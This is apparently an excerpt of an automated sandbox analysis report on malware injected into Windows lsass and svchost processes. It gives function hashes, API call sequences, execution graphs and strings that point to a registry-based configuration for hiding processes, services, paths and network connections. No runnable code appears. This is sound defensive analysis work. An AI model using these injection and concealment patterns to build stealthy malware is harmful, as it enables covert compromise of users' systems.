                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: a73d1f298939c95b8273a44cc4430b5fd8c3e8e17c0158018733cb94f3254e73
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 50617636B01A95CBFB609F6AD68439E77A1F349B88F244215EE4917B98DF38D488C701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: ae080d31f9a23d4b48301dcc4bdb2464afb26e9ddb5bb71d6685049e8a2a6eb7
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 5C51D0323042A2DBEBB18B5BA45835E77A0F356F84F285116DA8987BC5DF78C45CE702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 83ea0d018fee459cfa53da402ecaf07e370cce6283bd230a5add074b43673c95
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: BF519F7A2002A2CBFBA48B1BD68835A77A0F35AF95F244115DA5947BD9CF38D45CC702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 926694b6d52d54cb27d4976bf5ac45df6aaa9f61c1e787702c5ad3038b920f7b
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 7851E632711622E7DB94CB1AD488B2A3395F362F98F718126DA064374CEFB4D84DDB05
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 2aefe856cf9821ae54ee426a3807d8c36b3e988bff2276817065e4b5fdfe7aae
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 7631B031301661E7E794DF1AE88875A77A4F752F88F258019EE4A03748DF38C94DD706
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 307230fd63942bdd5a78379f5f9f12523036320d15212c8f65d9e8de9dc1814f
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: AFD1DD32704A91CAF751CB6AD6482AD3BB1F34AB98F244216CE5997BD9DE34C40EC341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: 35b72c5b87daf49ec089226d9ca65f2f0c7e377a4a9afe8c702c47c3c1fe457c
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: 9E018C36700AA1C7E784DF6BEA0814A6BA0F78EF85F644024EA5A43759DE38E05CC741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 3ddf5e4ff360607ae1ad631fdafb66c63b2c3da85c3dd6b57fe440fffbc7acd3
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 4E918472710661C7F7A09F6E97583AE2BA0B74AF88F744109DE0657AD5DE34C48EC702
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 2d278db7f6185bf4257e8498063ddb4dbc240bb3c3e343283c291c85a2a909c7
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: F3117022710F12CAFB40CF65E8583A933A4F31EB58F540E25EA6D427A4DF78D1AC8380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 6f07e790c581b63989c5fc7a634458588c2cb7c78a0069fc75f04618ec94c229
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 0B617933600B99DAEB60DF6AD08439E77A0F346B88F244215EF4917B98DF38D099D702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 71adc9c5821356b1c1c63586a9e8c75c0363f9b6de45721788ff6ca54b5d8a1b
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: A451A1227043A2C2F6A89A2FE25C3AB5761F38EF40F640125DD5A03B4EDE39C94C8742
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 7629f06d96b79a272e6f04d7db8bc3803aa5b6164494ce0c6112b717000e5649
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: EC41A232315A91C2EBA08F2AE6483AA77A0F79DB94F644021EE4D87798DF3CC54DC741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 5dd3689bbf5aff6326420e2155b0704a08a6b82fadef4d17dfd39c7e7aa88bd7
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 73112B36214B9183EBA18F1AE54435A77E5F789F94F684224EE8C07758DF3CC559CB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 93edb5fb0b132fd7271519c893dfeed14cc6724839e9e44b018e956b99003819
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: D7E08661740B55E1DF458F26E88429933A0DB5AF64F989122995C06351FF38D1FDC301
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: ecf5bb12e97ae8ede17a702195ef0fb2d0f2a7e240cfa2b5847f99b30a39af29
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 78E08C61B00B59E5DF468F26E88029973A0EB6AF64F989122CA4C06351FF38D1EDC301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 464bcb97e3c9314eea8166744373369e2b388c1d326151b7449f27b6ebef7635
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: A2116025B01B95C2FA84DB6BE50822A67A1F78EFD4F684025DE4E43769DE38D44E8301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 185b0546519f995496c93be5b0f86adfffaff4249d3f278c3fafc5b534794824
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 39E03939701615C7FB448B67D90834A3EE1FB8EF06F948024890907391DF7D949DC751

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14756 14e25ed1abc 14761 14e25ed1628 GetProcessHeap HeapAlloc 14756->14761 14758 14e25ed1ad2 Sleep SleepEx 14759 14e25ed1acb 14758->14759 14759->14758 14760 14e25ed1598 StrCmpIW StrCmpW 14759->14760 14760->14759 14805 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14761->14805 14763 14e25ed1650 14806 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14763->14806 14765 14e25ed1661 14807 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14765->14807 14767 14e25ed166a 14808 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14767->14808 14769 14e25ed1673 14770 14e25ed168e RegOpenKeyExW 14769->14770 14771 14e25ed18a6 14770->14771 14772 14e25ed16c0 RegOpenKeyExW 14770->14772 14771->14759 14773 14e25ed16e9 14772->14773 14774 14e25ed16ff RegOpenKeyExW 14772->14774 14809 14e25ed12bc RegQueryInfoKeyW 14773->14809 14775 14e25ed173a RegOpenKeyExW 14774->14775 14776 14e25ed1723 14774->14776 14779 14e25ed1775 RegOpenKeyExW 14775->14779 14780 14e25ed175e 14775->14780 14818 14e25ed104c RegQueryInfoKeyW 14776->14818 14784 14e25ed1799 14779->14784 14785 14e25ed17b0 RegOpenKeyExW 14779->14785 14783 14e25ed12bc 16 API calls 14780->14783 14786 14e25ed176b RegCloseKey 14783->14786 14787 14e25ed12bc 16 API calls 14784->14787 14788 14e25ed17eb RegOpenKeyExW 14785->14788 14789 14e25ed17d4 14785->14789 14786->14779 14792 14e25ed17a6 RegCloseKey 14787->14792 14790 14e25ed1826 RegOpenKeyExW 14788->14790 14791 14e25ed180f 14788->14791 14793 14e25ed12bc 16 API calls 14789->14793 14795 14e25ed184a 14790->14795 14796 14e25ed1861 RegOpenKeyExW 14790->14796 14794 14e25ed104c 6 API calls 14791->14794 14792->14785 14797 14e25ed17e1 RegCloseKey 14793->14797 14798 14e25ed181c RegCloseKey 14794->14798 14799 14e25ed104c 6 API calls 14795->14799 14800 14e25ed189c RegCloseKey 14796->14800 14801 14e25ed1885 14796->14801 14797->14788 14798->14790 14802 14e25ed1857 RegCloseKey 14799->14802 
14800->14771 14803 14e25ed104c 6 API calls 14801->14803 14802->14796 14804 14e25ed1892 RegCloseKey 14803->14804 14804->14800 14805->14763 14806->14765 14807->14767 14808->14769 14810 14e25ed148a RegCloseKey 14809->14810 14811 14e25ed1327 GetProcessHeap HeapAlloc 14809->14811 14810->14774 14812 14e25ed1476 GetProcessHeap HeapFree 14811->14812 14813 14e25ed1352 RegEnumValueW 14811->14813 14812->14810 14814 14e25ed13a5 14813->14814 14814->14812 14814->14813 14816 14e25ed13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14814->14816 14817 14e25ed141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14814->14817 14823 14e25ed152c 14814->14823 14816->14817 14817->14814 14819 14e25ed11b5 RegCloseKey 14818->14819 14820 14e25ed10bf 14818->14820 14819->14775 14820->14819 14821 14e25ed10cf RegEnumValueW 14820->14821 14822 14e25ed114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14820->14822 14821->14820 14822->14820 14824 14e25ed1546 14823->14824 14827 14e25ed157c 14823->14827 14825 14e25ed155d StrCmpIW 14824->14825 14826 14e25ed1565 StrCmpW 14824->14826 14824->14827 14825->14824 14826->14824 14827->14814 14828 14e255d273c 14830 14e255d276a 14828->14830 14829 14e255d2858 LoadLibraryA 14829->14830 14830->14829 14831 14e255d28d4 14830->14831

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: ec4161c4f1973986df8c574484aa40d597b44ab65623eef5f4e9b84d014c0903
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 45116DB1A3264082FBE49B25FF05FD922DCB79A345F5061249917855F6EFF9C1448350

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000014E25ED1628: GetProcessHeap.KERNEL32 ref: 0000014E25ED1633
                                                          • Part of subcall function 0000014E25ED1628: HeapAlloc.KERNEL32 ref: 0000014E25ED1642
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16B2
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16DF
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED16F9
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1719
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1734
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1754
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED176F
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED178F
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17AA
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED17CA
                                                        • Sleep.KERNEL32 ref: 0000014E25ED1AD7
                                                        • SleepEx.KERNELBASE ref: 0000014E25ED1ADD
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17E5
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1805
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1820
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1840
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED185B
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED187B
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1896
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED18A0
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 4f9138a27f515c4560b724a4ce78d8a5789e6dff9fc277979641b626aa87eaa8
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 4031BD7221264181EBD89B26DF51BE913EDBB8DBD4F0474219E0B876B6EE94C8518311

                                                        Control-flow Graph

                                                        control_flow_graph 57 14e25ed3844-14e25ed384f 58 14e25ed3869-14e25ed3870 57->58 59 14e25ed3851-14e25ed3864 StrCmpNIW 57->59 59->58 60 14e25ed3866 59->60 60->58
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 70b5d17667e6c287c63a42a861956bd54ed603b9f6973ac1a3c59364d2fced0b
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 8DD0A77433220586FF94DFE6AEC4EE423DCFB08764F985024CD02012B0DB988D8D9710

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 61d15e7f8051c1c6ea22e4ab23ff41feee112f27c0d23cc355fd173832c7c0b5
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: F7615633F4229187DB54CF15CA40BADB3DAF755BA4F988121CE5A03798DA78D892C700

                                                        Control-flow Graph (basic-block graph for the function at 14e25ed2b2c; API nodes: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW; legend: Executed / Not Executed; edge data omitted)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 5f587f22587abd1431a1499f71e10d14118b5f21938d0c7cdf4f0e995d43f0cd
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 5AB1AD72222A5086EBE98F25DE40BE963EDFB46B94F046016EE0A577B4DFB5CC40C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: a58b129de63e11622298d6c6a6695538686e417bbbb43f62ee147bc6e5dcd9c5
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: C5318272215B808AEBA09F60F840BED73B8F785754F54502ADB4E47BA9EF78C548C710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 15f96c7993330800901423ecee5f9673b24142775bcc2ce8a9715945b3205e8b
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 12318072215F8086DBA0CF25E940BDE73E8F78A764F541126EA9E43BA9DF78C545CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: c1bc9262416f542b9bcf67935fbe76358c1d3776086d0358d464ba4c20ede195
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 32713A76721A1086EBA09F61EA80ADD23EDFB89B98F002115DE4F47B39DFB8C544C340

